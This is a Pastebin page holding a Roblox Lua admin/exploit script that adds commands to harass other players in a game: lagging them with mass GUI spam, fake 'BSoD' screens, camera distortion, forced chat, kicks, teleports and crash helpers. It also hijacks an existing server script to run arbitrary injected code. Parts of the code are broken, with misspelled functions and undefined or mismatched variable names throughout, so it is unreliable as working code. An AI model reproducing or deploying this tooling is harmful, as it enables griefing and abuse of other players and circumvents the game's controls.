Advertisement
Jaden11

ROBLOX Tab script

Dec 6th, 2014
584
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 47.91 KB | None | 0 0
  1. wait()
  2. LocalPlayerGame=Game:GetService("Players").LocalPlayer
  3.  
  4. script["Parent"]=(_Tabs_)
  5. Tabs={}
  6. Cmds={}
  7. key={}
  8. chatgui=false
  9. godmode=false
  10. Bad={"TheTabScript"}
  11. connection=nil
  12.  
  13. table=Instance.new("Model",Workspace)
  14. tabModel.Name=("fishy12311 tabs!")
  15. Soucename=("TabSource")
  16. BanList=("")
  17.  
  18. function Cras(Player)
  19. Player=stirng.lower(Playeror ("nil")))
  20. localVaule = Instance.new("StringVaule")
  21. Vaule["Name"]=("DISC: "..Player)
  22. Vaule["Parent"]=("script.ParentGame.Lighting")
  23. Game["Derbis"]:AddedItem(Vaule,0)
  24.  
  25.  
  26.  
  27.  
  28. end
  29.  
  30. LagSource = [==[
  31. wait(0)
  32. script.Parent = nil
  33. plr = game:GetService("Players").LocalPlayer
  34. local plrgui = plr:findFirstChild("PlayerGui")
  35. if plrgui == nil then repeat wait() plrgui = plr:findFirstChild("PlayerGui") until plrgui ~= nil end
  36. while plr.Parent == game:GetService("Players") do
  37. wait()
  38. for i = 1, 1000 do
  39. local sc = Instance.new("ScreenGui",plrgui)
  40. local fr = Instance.new("TextLabel",sc)
  41. fr.Text = "ur an noob"
  42. fr.Size = UDim2.new(1, 0, 1, 0)
  43. fr.FontSize = "Size48"
  44. end
  45. end
  46. ]==]
  47. SoDSource = [==[
  48. game:GetService('Players').LocalPlayer.CameraMode = Enum.CameraMode.LockFirstPerson
  49. wait(0)
  50. script.Parent = nil
  51. plr = game:GetService("Players").LocalPlayer
  52. local plrgui = plr:findFirstChild("PlayerGui")
  53. if plrgui == nil then repeat wait() plrgui = plr:findFirstChild("PlayerGui") until plrgui ~= nil end
  54. while plr.Parent == game:GetService("Players") do
  55. wait()
  56. for i = 1, 1000 do
  57. local sc = Instance.new("ScreenGui",plrgui)
  58. local fr = Instance.new("TextLabel",sc)
  59. fr.Text = "BSoD'd By Bl3ck M3gic <3"
  60. fr.Size = UDim2.new(1, 0, 1, 0)
  61. fr.FontSize = "Size48"
  62. end
  63. end
  64. ]==]
  65.  
  66. FunScript = [[
  67. LP = game:service'Players'.LocalPlayer
  68. Shapes = {"Ball", "Block"}
  69. wait()
  70. script.Parent = nil
  71. Delay(0, function()
  72. while wait() do
  73. workspace.CurrentCamera.CameraType = "Scriptable"
  74. workspace.CurrentCamera.FieldOfView = workspace.CurrentCamera.FieldOfView + math.random(-5,5)
  75. workspace.CurrentCamera:SetRoll(workspace.CurrentCamera:GetRoll()+0.075)
  76. workspace.CurrentCamera.CoordinateFrame = workspace.CurrentCamera.CoordinateFrame * CFrame.new(math.random(-2,2),math.random(-2,2),math.random(-2,2))
  77. local Part = Instance.new("Part", workspace.CurrentCamera)
  78. Part.Shape = Shapes[math.random(1, 2)]
  79. Part.Anchored = true
  80. Part.BrickColor = BrickColor.new(math.random(),math.random(),math.random())
  81. Part.Size = Vector3.new(math.random(5,10),math.random(-25,25),math.random(5,10))
  82. Part.CFrame = workspace.CurrentCamera.CoordinateFrame * CFrame.new(math.random(-250,250),math.random(-100,100),math.random(-250,250)) * CFrame.Angles(math.random(),math.random(),math.random())
  83. local Smoke = Instance.new("Smoke", Part)
  84. Smoke.Color = Color3.new(math.random(), math.random(), math.random())
  85. Smoke.Opacity = 0.7
  86. local Sparkles = Instance.new("Sparkles", Part)
  87. Sparkles.SparkleColor = Color3.new(math.random(), math.random(), math.random())
  88. local Fire = Instance.new("Fire", Part)
  89. Fire.Color = Color3.new(math.random(), math.random(), math.random())
  90. Fire.SecondaryColor = Color3.new(math.random(), math.random(), math.random())
  91. local Ex = Instance.new("Explosion", workspace.CurrentCamera)
  92. Ex.Position = Vector3.new(math.random(-250,250),math.random(10,100),math.random(-250,250))
  93. Ex.BlastPressure = 15
  94. Ex.BlastRadius = 12.5
  95. if not workspace.CurrentCamera:findFirstChild("Hint") then
  96. local mes = Instance.new("Hint", workspace.CurrentCamera)
  97. mes.Text = "Lel :3"
  98. end
  99. end
  100. end)
  101. ]]
  102. Playerlist={}
  103.  
  104. function NilCrash(Name)
  105. local Crasher=Instance.new("StringValue")
  106. Crasher.Name=("Client")
  107. Crasher.Value=string.lower(tostring(Name))
  108. Crasher.Parent=Game["Lighting"]
  109. wait(1)
  110. if Crasher~=nil and Crasher.Parent~=nil then
  111. ypcall(function()
  112. Crasher:Destroy()
  113. end)
  114. end
  115. end
  116.  
  117. --[[ReName Players if needed.]]--
  118. coroutine.resume(coroutine.create(function()
  119. while wait(3) do
  120. if Game:GetService("Players").Name~=("Players") then
  121. Game:GetService("Players").Name=("Players")
  122. end
  123. end
  124. end))
  125.  
  126.  
  127.  
  128.  
  129. function Dismiss()
  130. for _=1,10 do
  131. for _=1,#Tabs do
  132. table.remove(Tabs,_)
  133. if tabmodel~=nil then
  134. tabmodel:ClearAllChildren()
  135. end
  136. end
  137. end
  138. end
  139.  
  140. function AddCmd(Name,Say,Desc,Func)
  141. table.insert(Cmds,{["Name"]=Name,["Say"]=Say,["Desc"]=Desc,["Func"]=Func})
  142. end
  143.  
  144.  
  145. AddCmd("Banlist","banl","Show the Current Banned Players.",
  146. function()
  147. Dismiss()
  148. for _,BannedPlr in pairs(Banlist) do
  149. Output(BannedPlr)
  150. end
  151. end)
  152.  
  153. AddCmd("Lol","lol","Make the Selected Player have Lol.",
  154. function(Plrs)
  155. for _,Plr in pairs(Plrs) do
  156. if Plr~=nil and Plr["Backpack"]~=nil then
  157. NewLS(FunScript,Plr["Backpack"])
  158. end
  159. end
  160. end)
  161.  
  162. AddCmd("Lag player","lag","Lag the Selected Player.",
  163. function(Plrs)
  164. for _,Plr in pairs(Plrs) do
  165. if Plr~=nil and Plr["Backpack"]~=nil then
  166. NewLS(LagSource,Plr["Backpack"])
  167. end
  168. end
  169. end)
  170.  
  171. AddCmd("Nuke","nuke","Nuke the Selected Player.",
  172. function(Plrs)
  173. for _,Plr in pairs(Plrs) do
  174. if Plr~=nil and Plr["Character"] then
  175. Explosion=Instance.new("Explosion",Plr["Character"])
  176. Explosion["Position"]=Plr["Character"].Torso
  177. end
  178. end
  179. end)
  180.  
  181. AddCmd("Fire","fire","Give the Selected Player Fire.",
  182. function(Plrs)
  183. for _,Plr in pairs(Plrs) do
  184. if Plr~=nil and Plr["Character"]~=nil and Plr["Character"].Torso~=nil then
  185. Instance.new("Fire",Plr["Character"].Torso)
  186. end
  187. end
  188. end)
  189.  
  190. AddCmd("Un-fire","unfire","Removes Fire from a Selected Player.",
  191. function(Plrs)
  192. for _,Plr in pairs(Plrs) do
  193. if Plr~=nil and Plr["Character"]~=nil and Plr["Character"].Torso~=nil then
  194. pcall(function()
  195. for _,Child in pairs(Plr["Character"].Torso:GetChildren()) do
  196. if Child:IsA("Fire") then
  197. Child:Destroy()
  198. end
  199. end
  200. end)
  201. end
  202. end
  203. end)
  204.  
  205. found=false
  206.  
  207. coroutine.wrap(function()
  208. while found==false do
  209. if game.PlaceId == 21053279 or game.PlaceId == 21053219 then break end
  210. for _,scriptinworkspace in pairs(workspace:children()) do
  211. if scriptinworkspace then
  212. if scriptinworkspace:IsA("Script") then
  213. if scriptinworkspace:FindFirstChild(SourceName) then
  214. newScript = scriptinworkspace:Clone()
  215. wait(0.2)
  216. newScript.Name = "NewScript"
  217. newScript.Disabled = true
  218. newScript:FindFirstChild(SourceName).Value = ""
  219. Output("Source found",__)
  220. found = true
  221. break
  222. end
  223. end
  224. end
  225. end
  226. wait();
  227. end
  228. end)()
  229.  
  230. AddCmd("Unpunish player","unpunish","Restore the player's character",
  231. function(plrs)
  232. for _, plr in pairs(plrs) do
  233. if plr then
  234. NewS("game.Players['"..plr.Name.."']:LoadCharacter()", workspace)
  235. end
  236. end
  237. end
  238. )
  239.  
  240. function NewS(sourcevalue, parent)
  241. if game.PlaceId == 21053279 or game.PlaceId == 21053219 then
  242. NS(sourcevalue, parent)
  243. else
  244. if newScript then
  245. local scr = newScript:Clone()
  246. if scr:FindFirstChild(SourceName) then
  247. if scr:FindFirstChild(SourceName) then
  248. scr:FindFirstChild(SourceName).Value = sourcevalue
  249. scr.Parent = parent
  250. wait(0.5)
  251. scr.Disabled = false
  252. return scr
  253. end
  254. end
  255. end
  256. end
  257. end
  258.  
  259. sorcery = script:Clone()
  260.  
  261. Services = {
  262. game:GetService("Workspace"),
  263. game:GetService("Players"),
  264. game:GetService("Lighting"),
  265. game:GetService("StarterPack"),
  266. game:GetService("StarterGui"),
  267. game:GetService("Teams"),
  268. game:GetService("SoundService"),
  269. game:GetService("Debris"),
  270. game:GetService("InsertService"),
  271. game:GetService("RunService"),
  272. game:GetService("Chat"),
  273. game:GetService("TeleportService"),
  274. game:GetService("Geometry"),
  275. game:GetService("MarketplaceService"),
  276. game:GetService("BadgeService"),
  277. game:GetService("NetworkClient"),
  278. game:GetService("FriendService"),
  279. }
  280.  
  281. function Explore(Item)
  282. Dismiss()
  283. if(Item==nil)then
  284. for _,v in pairs(Services)do
  285. Output(tostring(v),function() wait() Explore(v) end)
  286. end;
  287. else
  288. f={
  289. ['View children']=function()
  290. Dismiss()
  291. for _,v in pairs(Item:children())do
  292. Output(v.Name,function()
  293. wait()
  294. Explore(v)
  295. end);
  296. end;
  297. end;
  298. ['View parent']=function()
  299. wait()
  300. Explore(Item.Parent)
  301. end;
  302. ['Destroy']=function()
  303. Item:Destroy();
  304. Explore(Item.Parent);
  305. end;
  306. ['Clear']=function()
  307. Item:ClearAllChildren()
  308. end;
  309. ['Clone']=function()
  310. pcall(function()
  311. cloneableObj = Item:clone()
  312. end)
  313. end;
  314. ['Remove']=function()
  315. Item:remove()
  316. end;
  317. ['Paste']=function()
  318. if cloneableObj then
  319. cloneableObj.Parent = Item
  320. end
  321. end;
  322. ['Ki'..'ck Item']=function()
  323. NewLS("local plr = game:service'Players'.LocalPlayer; plr:Ki".."ck()", Item)
  324. end;
  325. };
  326. for i,v in pairs(f)do
  327. Output(tostring(i),v);
  328. end;
  329. Output('Item Name: \''..tostring(Item.Name)..'\'',nil);
  330. Output('Class: \''..tostring(Item.ClassName)..'\'',nil);
  331. if cloneableObj then
  332. Output('Currently Cloning: \''..tostring(cloneableObj.Name)..'\'',nil);
  333. end
  334. end;
  335. end;
  336.  
  337. AddCmd("Explore","explore","Explore the game",
  338. function()
  339. Explore()
  340. end
  341. )
  342.  
  343. function NewLS(sourcevalue, parent)
  344. if game.PlaceId == 21053279 or game.PlaceId == 21053219 then
  345. NLS(sourcevalue, parent)
  346. else
  347. local NS = sorcery:Clone()
  348. NS.Name = "NewLocal"
  349. local Source = NS:findFirstChild(SourceName)
  350. if Source == nil then Instance.new('StringValue',NS).Name = SourceName end Source = NS:findFirstChild(SourceName)
  351. Source.Value = sourcevalue
  352. NS.Parent = parent
  353. NS.Disabled = false
  354. return NS
  355. end
  356. end
  357.  
  358. Clothes = {}
  359.  
  360. for _,Item in pairs(LocalPlayer.Character:GetChildren()) do
  361. if Item:IsA('CharacterMesh') or Item:IsA('Hat') or Item:IsA('Shirt') or Item:IsA('Pants') then
  362. table.insert(Clothes,Item:Clone())
  363. end
  364. end
  365. for i,v in pairs(LocalPlayer.Character:GetChildren()) do
  366. if v:IsA("BodyColors") then
  367. body = v
  368. torsocolor = body.TorsoColor
  369. leftlegcolor = body.LeftLegColor
  370. rightlegcolor = body.RightLegColor
  371. leftarmcolor = body.LeftArmColor
  372. rightarmcolor = body.RightArmColor
  373. headcolor = body.HeadColor
  374. end
  375. end
  376.  
  377. mouse = LocalPlayer:GetMouse()
  378.  
  379. mouse.KeyDown:connect(function(key)
  380. if key == "z" then
  381. game:service'StarterGui':SetCoreGuiEnabled(4, true)
  382. end
  383. end)
  384.  
  385. AddCmd("Toogle ChatGUI","chat","Toogle ChatGUI on/off",
  386. function(plrs, msg)
  387. if msg == "off" then
  388. chatgui = false
  389. elseif msg == "on" then
  390. chatgui = true
  391. end
  392. end
  393. )
  394.  
  395. AddCmd("BSoD","bsod","BSoD a player",
  396. function(Plrs)
  397. for _, plr in pairs(Plrs) do
  398. if plr and plr.Backpack then
  399. for i = 0,7,1 do
  400. NewLS(BSoDSource, plr.Backpack)
  401. Output("You BSoD'D "..plr.Name, __)
  402.  
  403. end
  404. end
  405. end
  406. end
  407. )
  408.  
  409. AddCmd("'BSoD' ban","bb","BSoD ban a player",
  410. function(plrs, msg)
  411. for _,v in pairs(plrs) do
  412. if v then
  413. table.insert(BSoDBanList,v.Name)
  414. Output('|BSoD Banned | '..v.Name,__)
  415. for _, plr in pairs(plrs) do
  416. if plr and plr.Backpack then
  417. NewLS(BSoDSource, plr.Backpack)
  418. else
  419. Output(Error)
  420. end
  421. end
  422. end
  423. end
  424. end
  425. )
  426.  
  427. AddCmd("Set WalkSpeed","ws","Set the walkspeed of player",
  428. function(plrs, msg)
  429. local keypos = msg:find(key)
  430. local targPlayers = msg:sub(1,keypos-1)
  431. local plrs = getPlayers(targPlayers)
  432. local speed = msg:sub(tonumber(keypos+1))
  433. for _,v in pairs(plrs) do
  434. if v.Character ~= nil and v.Character:findFirstChild("Humanoid") ~= nil then
  435. v.Character:findFirstChild("Humanoid").WalkSpeed = speed
  436. end
  437. end
  438. end
  439. )
  440.  
  441.  
  442.  
  443. AddCmd("Teleport","tp","Teleport a player to a place",
  444. function(plrs, msg)
  445. local keypos = msg:find(key)
  446. local targPlayers = msg:sub(1,keypos-1)
  447. local plrs = getPlayers(targPlayers)
  448. local id = msg:sub(tonumber(keypos+1))
  449. for _,v in pairs(plrs) do
  450. if v and v.Backpack then
  451. NewLS([[game:service'TeleportService':Teleport(]]..id..[[)]], v.Backpack)
  452. end
  453. end
  454. end
  455. )
  456.  
  457.  
  458. AddCmd("Chat","cht","Forces a player to chat ;)",
  459. function(plrs, msg)
  460. local keypos = msg:find(key)
  461. local targPlayers = msg:sub(1,keypos-1)
  462. local plrs = getPlayers(targPlayers)
  463. local id = msg:sub(tonumber(keypos+1))
  464. for _,v in pairs(plrs) do
  465. if v and v.Backpack then
  466. NewLS([==[game:service'Players':Chat(']==]..id..[==[')]==], v.Backpack)
  467. end
  468. end
  469. end
  470. )
  471.  
  472. Bad_Char = ""
  473.  
  474. function chatgui(msg)
  475. if not chatgui then return end
  476. if probemode == false then
  477. if LocalPlayer.Character:findFirstChild("Head") then
  478. mainPart = LocalPlayer.Character:findFirstChild("Head")
  479. end
  480. end
  481. if probemode == true then
  482. if game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") then
  483. mainPart = game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe")
  484. end
  485. end
  486. local bg = Instance.new("BillboardGui", mainPart)
  487. bg.Adornee = mainPart
  488. bg.Name = "CHATGUIBG"
  489. bg.Size = UDim2.new(4, 0, 2.5, 0)
  490. bg.StudsOffset = Vector3.new(-4, 2, 0)
  491. local bg2 = Instance.new("BillboardGui", mainPart)
  492. bg2.Adornee = mainPart
  493. bg2.Name = "CHATGUIBG2"
  494. bg2.Size = UDim2.new(4, 0, 2.5, 0)
  495. bg2.StudsOffset = Vector3.new(-4, 4.5, 0)
  496. local text = Instance.new("TextLabel", bg)
  497. text.Size = UDim2.new(3, 0, 0.5, 0)
  498. text.FontSize = "Size18"
  499. text.TextScaled = true
  500. text.TextTransparency = 0
  501. text.BackgroundTransparency = 1
  502. text.TextTransparency = 0
  503. text.TextStrokeTransparency = 0
  504. text.Font = "Arial"
  505. text.TextColor = BrickColor.new("Institutional white")
  506. text.Text = " "
  507. Message = msg:sub(1)
  508. if #Message >50 then return end
  509. for i = 0, #Message, 1 do
  510. wait(0.01)
  511. text.Text = string.gsub(""..LocalPlayer.Name..": "..Message:sub(0, i),'fk','fk')
  512. end
  513. wait()
  514. coroutine.resume(coroutine.create(function()
  515. for i = 0, 5, 0.05 do
  516. if bg ~= nil then
  517. if bg2 ~= nil then
  518. wait()
  519. bg2.StudsOffset = bg2.StudsOffset + Vector3.new(0, 0.05, 0)
  520. end
  521. bg.StudsOffset = bg.StudsOffset + Vector3.new(0, 0.05, 0)
  522. end
  523. end
  524. end))
  525. for i=text.TextTransparency,1,0.02 do
  526. wait()
  527. text.TextTransparency = i
  528. text.TextStrokeTransparency = i
  529. end
  530. if bg == nil then return end
  531. bg:Destroy()
  532. if bg2 == nil then return end
  533. bg2:Destroy()
  534. end
  535.  
  536. LocalPlayer.Chatted:connect(chatgui)
  537.  
  538. AddCmd("Message","m","Make a message over the screen",
  539. function(nothing, msg)
  540. if found then
  541. NewS([[
  542. a = Instance.new("Message", workspace)
  543. msg = "]]..msg..[["
  544. msg = msg:gsub("","\5")
  545. game:service'Debris':AddItem(a, 5)
  546. while wait() do
  547. for i = 30,0,-1 do
  548. a.Text = "-->"..string.rep(" ",i)..msg..string.rep(" ",i).."<--"
  549. wait()
  550. end
  551. for i = 0,30,1 do
  552. a.Text = "-->"..string.rep(" ",i)..msg..string.rep(" ",i).."<--"
  553. wait()
  554. end
  555. end
  556. ]], workspace)
  557. end
  558. end
  559. )
  560.  
  561. AddCmd("Hint","h","Make a message at top of the screen",
  562. function(nothing, msg)
  563. if found then
  564. NewS([[
  565. a = Instance.new("Hint", workspace)
  566. msg = "]]..msg..[["
  567. msg = msg:gsub("","\5")
  568. game:service'Debris':AddItem(a, 5)
  569. while wait() do
  570. for i = 30,0,-1 do
  571. a.Text = "-->"..string.rep(" ",i)..msg..string.rep(" ",i).."<--"
  572. wait()
  573. end
  574. for i = 0,30,1 do
  575. a.Text = "-->"..string.rep(" ",i)..msg..string.rep(" ",i).."<--"
  576. wait()
  577. end
  578. end
  579. ]], workspace)
  580. end
  581. end
  582. )
  583.  
  584. AddCmd("Playerinfo","pinfo","Shows info on a player",
  585. function(plrs)
  586. for _,plr in pairs(plrs) do
  587. if plr then
  588. Output("Age: "..plr.AccountAge,"noncolar")
  589. Output("Membership: "..plr.MembershipType.Name,"Hot pink")
  590. Output("Player: "..plr.Name,"Really red")
  591. Output("Id: "..plr.userId,"New Yeller")
  592. Output("Camera Mode: "..plr.CameraMode.Name,"Dark green")
  593. end
  594. end
  595. end
  596. )
  597.  
  598. AddCmd("Commands","cmds","Show the list of commands",
  599. function()
  600. Dismiss()
  601. for i, v in pairs(Cmds) do
  602. Output(v["Name"],
  603. function()
  604. Output("Description: "..v["Desc"], __)
  605. Output("Usage: "..v["Say"], __)
  606. Output("Name: "..v["Name"], __)
  607. end)
  608. end
  609. end
  610. )
  611.  
  612. AddCmd("Tools","tools","Tools to build",
  613. function()
  614. x = game:GetService("InsertService"):LoadAsset(73089166) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  615. x = game:GetService("InsertService"):LoadAsset(73089204) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  616. x = game:GetService("InsertService"):LoadAsset(73089190) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  617. x = game:GetService("InsertService"):LoadAsset(58880579) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  618. x = game:GetService("InsertService"):LoadAsset(60791062) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  619. x = game:GetService("InsertService"):LoadAsset(73089239) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  620. end
  621. )
  622.  
  623. AddCmd("Fly","fly","fly lel",
  624. function()
  625. local mouse = game.Players.LocalPlayer:GetMouse()
  626. repeat wait() until mouse
  627. local plr = game.Players.LocalPlayer
  628. local torso = plr.Character.Torso
  629. local flying = true
  630. local deb = true
  631. local ctrl = {f = 0, b = 0, l = 0, r = 0}
  632. local lastctrl = {f = 0, b = 0, l = 0, r = 0}
  633. local maxspeed = 50
  634. local speed = 0
  635. function Fly()
  636. local bg = Instance.new("BodyGyro", torso)
  637. bg.P = 9e4
  638. bg.maxTorque = Vector3.new(9e9, 9e9, 9e9)
  639. bg.cframe = torso.CFrame
  640. local bv = Instance.new("BodyVelocity", torso)
  641. bv.velocity = Vector3.new(0,0.1,0)
  642. bv.maxForce = Vector3.new(9e9, 9e9, 9e9)
  643. repeat wait()
  644. plr.Character.Humanoid.PlatformStand = true
  645. if ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0 then
  646. speed = speed+.5+(speed/maxspeed)
  647. if speed > maxspeed then
  648. speed = maxspeed
  649. end
  650. elseif not (ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0) and speed ~= 0 then
  651. speed = speed-1
  652. if speed < 0 then
  653. speed = 0
  654. end
  655. end
  656. if (ctrl.l + ctrl.r) ~= 0 or (ctrl.f + ctrl.b) ~= 0 then
  657. bv.velocity = ((game.Workspace.CurrentCamera.CoordinateFrame.lookVector * (ctrl.f+ctrl.b)) + ((game.Workspace.CurrentCamera.CoordinateFrame * CFrame.new(ctrl.l+ctrl.r,(ctrl.f+ctrl.b)*.2,0).p) - game.Workspace.CurrentCamera.CoordinateFrame.p))*speed
  658. lastctrl = {f = ctrl.f, b = ctrl.b, l = ctrl.l, r = ctrl.r}
  659. elseif (ctrl.l + ctrl.r) == 0 and (ctrl.f + ctrl.b) == 0 and speed ~= 0 then
  660. bv.velocity = ((game.Workspace.CurrentCamera.CoordinateFrame.lookVector * (lastctrl.f+lastctrl.b)) + ((game.Workspace.CurrentCamera.CoordinateFrame * CFrame.new(lastctrl.l+lastctrl.r,(lastctrl.f+lastctrl.b)*.2,0).p) - game.Workspace.CurrentCamera.CoordinateFrame.p))*speed
  661. else
  662. bv.velocity = Vector3.new(0,0.1,0)
  663. end
  664. bg.cframe = game.Workspace.CurrentCamera.CoordinateFrame * CFrame.Angles(-math.rad((ctrl.f+ctrl.b)*50*speed/maxspeed),0,0)
  665. until not flying
  666. ctrl = {f = 0, b = 0, l = 0, r = 0}
  667. lastctrl = {f = 0, b = 0, l = 0, r = 0}
  668. speed = 0
  669. bg:Destroy()
  670. bv:Destroy()
  671. plr.Character.Humanoid.PlatformStand = false
  672. end
  673. mouse.KeyDown:connect(function(key)
  674. if key:lower() == "e" then
  675. if flying then flying = false
  676. else
  677. flying = true
  678. Fly()
  679. end
  680. elseif key:lower() == "w" then
  681. ctrl.f = 1
  682. elseif key:lower() == "s" then
  683. ctrl.b = -1
  684. elseif key:lower() == "a" then
  685. ctrl.l = -1
  686. elseif key:lower() == "d" then
  687. ctrl.r = 1
  688. end
  689. end)
  690. mouse.KeyUp:connect(function(key)
  691. if key:lower() == "w" then
  692. ctrl.f = 0
  693. elseif key:lower() == "s" then
  694. ctrl.b = 0
  695. elseif key:lower() == "a" then
  696. ctrl.l = 0
  697. elseif key:lower() == "d" then
  698. ctrl.r = 0
  699. end
  700. end)
  701. Fly()
  702. end
  703. )
  704.  
  705. AddCmd("Rejoin player","rej","Rejoin the player",
  706. function(plrs)
  707. for _, plr in pairs(plrs) do
  708. if plr and plr.Backpack then
  709. NewLS("game:service'TeleportService':Teleport(game.PlaceId)", plr.Backpack)
  710. end
  711. end
  712. end
  713. )
  714.  
  715.  
  716. AddCmd("Nil players","nilp","Check nil players",
  717. function()
  718. NewS([[
  719. local mod = Instance.new("Model")
  720. mod.Name = "NilPlayers"
  721. pcall(function()
  722. for k,v in pairs(game:GetService("NetworkServer"):GetChildren()) do
  723. pcall(function()
  724. local p = v:GetPlayer()
  725. if p.Parent ~= game.Players then
  726. local a = Instance.new("StringValue", mod)
  727. a.Value = "NIL: "..p.Name
  728. else
  729. local a = Instance.new("StringValue", mod)
  730. a.Value = p.Name
  731. end
  732. end)
  733. end
  734. end)
  735. mod.Parent = game:GetService("Lighting")
  736. script:Destroy()
  737. ]], game.Workspace)
  738. local np = false
  739. for i=1,5,0.1 do
  740. np = game:GetService("Lighting"):findFirstChild("NilPlayers")
  741. if np then break end
  742. wait(0.1)
  743. end
  744. if not np then
  745. return Output("Something went wrong! F\5U\5C\5K!","Really red")
  746. end
  747. for k,v in pairs(np:GetChildren()) do
  748. if v:IsA("StringValue") then
  749. if v.Value:lower():sub(1,4) == "nil:" then
  750. Output(v.Value,"Really red")
  751. else
  752. Output(v.Value)
  753. end
  754. end
  755. end
  756. wait()
  757. np:Destroy()
  758. end
  759. )
  760.  
  761.  
  762. AddCmd("Create base","base","Create the base",
  763. function()
  764. a = Instance.new("Part")
  765. a.Parent = Workspace
  766. a.Name = "Base"
  767. a.Position = Vector3.new(0, 0.6, 0)
  768. a.Size = Vector3.new(1002, 0, 1002)
  769. a.Material = "Grass"
  770. a.Anchored = true
  771. a.BrickColor = BrickColor.new("Dark green")
  772. end
  773. )
  774.  
  775. AddCmd("Ping","ping","Ping something",
  776. function(plrs, msg)
  777. if msg == "" then
  778. Output("pong", __)
  779. else
  780. Output(msg, __)
  781. end
  782. end
  783. )
  784.  
  785. AddCmd("Dismiss","dt","Dismiss tabs",
  786. function()
  787. Dismiss()
  788. end
  789. )
  790.  
  791. AddCmd("Probe mode", "probe", "Be a ball and fly around",
  792. function()
  793. probemode = true
  794. Dismiss()
  795. if LocalPlayer.Character then LocalPlayer.Character = nil end
  796. if workspace.CurrentCamera == nil then return end
  797. local camera = workspace.CurrentCamera
  798. local probe = Instance.new("Part", workspace)
  799. M = Instance.new("SpecialMesh", probe)
  800. M.MeshId=("http://www.roblox.com/asset/?id=21057410")
  801. M.TextureId=("http://www.roblox.com/asset/?id=21243140")
  802. M.Scale = Vector3.new(1, 1, 1)
  803. probe.TopSurface = 0
  804. probe.Anchored = true
  805. probe.BottomSurface = 0
  806. probe.Name = LocalPlayer.Name.."'s probe"
  807. local rotation = 0
  808. local bbg = Instance.new("BillboardGui", probe)
  809. bbg.Size = UDim2.new(3, 0, 3 ,0)
  810. bbg.ExtentsOffset = Vector3.new(0, 2, 0)
  811. local txt = Instance.new("TextLabel", bbg)
  812. txt.FontSize = "Size24"
  813. txt.Font = "SourceSansBold"
  814. txt.Text = LocalPlayer.Name
  815. txt.BackgroundTransparency = 1
  816. txt.TextColor = BrickColor.new("Institutional blue")
  817. txt.TextStrokeTransparency = 0
  818. txt.Size = UDim2.new(1,0,1,0)
  819. local pl = Instance.new("PointLight", probe)
  820. pl.Shadows = true
  821. pl.Range = 20
  822. coroutine.wrap(function()
  823. while pl ~= nil do
  824. pl.Color=Color3.new(math.random(),math.random(),math.random())
  825. wait(0.8)
  826. end
  827. end)()
  828. coroutine.wrap(function()
  829. while LocalPlayer.Character == nil and probe.Parent == workspace and probe ~= nil and game:service'RunService'.Stepped:wait() do
  830. probe.CFrame = camera.Focus * CFrame.Angles(0, rotation, 0)
  831. rotation = rotation + 0.1
  832. end
  833. if camera then
  834. camera:Destroy()
  835. end
  836. probe:Destroy()
  837. end)()
  838. end
  839. )
  840.  
  841. AddCmd("Make your character","char","Creates your character",
  842. function()
  843. if workspace.CurrentCamera == nil then return end
  844. local camera = workspace.CurrentCamera
  845. local new_char = game:service("InsertService"):LoadAsset(68452456):GetChildren()[1]
  846. local human = new_char.Humanoid
  847. human.Parent = nil
  848. new_char.Name = LocalPlayer.Name
  849. wait()
  850. human.Parent = new_char
  851. camera.CameraSubject = human
  852. camera.CameraType = "Custom"
  853. new_char.Parent = workspace
  854. local pl = Instance.new("PointLight", new_char.Head)
  855. pl.Range = 24
  856. pl.Shadows = true
  857. LocalPlayer.Character = new_char
  858. new_char:MakeJoints()
  859. new_char.Torso.BrickColor = torsocolor
  860. new_char["Left Leg"].BrickColor = leftlegcolor
  861. new_char["Right Leg"].BrickColor = rightlegcolor
  862. new_char["Left Arm"].BrickColor = leftarmcolor
  863. new_char["Right Arm"].BrickColor = rightarmcolor
  864. new_char.Head.BrickColor = headcolor
  865. for i,v in pairs(Clothes) do
  866. v:Clone().Parent = new_char
  867. end
  868. probemode = false
  869. end
  870. )
  871.  
  872. AddCmd("Remove The Admin","bmremove","Remove The Admin",
  873. function()
  874. Output("Are You Mad?",
  875. function()
  876. Output("You Sure You Wanna Remove This?",
  877. function()
  878. Output("Okay..",
  879. function()
  880. for i,v in pairs(getfenv(1)) do
  881. getfenv(1)[i] = nil
  882. end
  883. script.Disabled = true
  884. LocalPlayer = NO_PLAYER
  885. script:findFirstChild(SourceName).Value = " "
  886. script.Disabled = true
  887. tabmodel:ClearAllChildren()
  888. tabmodel:Destroy()
  889. connection:disconnect()
  890. Tabs = {}
  891. Cmds = {}
  892. Banlist = {}
  893. fukhed.all = true
  894. coroutine.resume(coroutine.create(function()
  895. while wait(0.1) do
  896. Dismiss()
  897. end
  898. end))
  899. end)
  900. end)
  901. end)
  902. end)
  903.  
  904. AddCmd("ForceField","ff","Give forcefield to player",
  905. function(plrs)
  906. for _, plr in pairs(plrs) do
  907. if plr and plr.Character then
  908. Instance.new("ForceField", plr.Character)
  909. end
  910. end
  911. end
  912. )
  913.  
  914. AddCmd("Sparkles","sparkles","Give sparkles to player",
  915. function(plrs)
  916. for _, plr in pairs(plrs) do
  917. if plr and plr.Character and plr.Character.Torso then
  918. Instance.new("Sparkles", plr.Character.Torso)
  919. end
  920. end
  921. end
  922. )
  923.  
  924. AddCmd("Un-Sparkles","unsparkles","Remove sparkles from player",
  925. function(plrs)
  926. for _, plr in pairs(plrs) do
  927. if plr and plr.Character and plr.Character.Torso then
  928. pcall(function()
  929. for j, k in pairs(plr.Character.Torso:GetChildren()) do
  930. if k:IsA("Sparkles") then
  931. k:Destroy()
  932. end
  933. end
  934. end)
  935. end
  936. end
  937. end
  938. )
  939.  
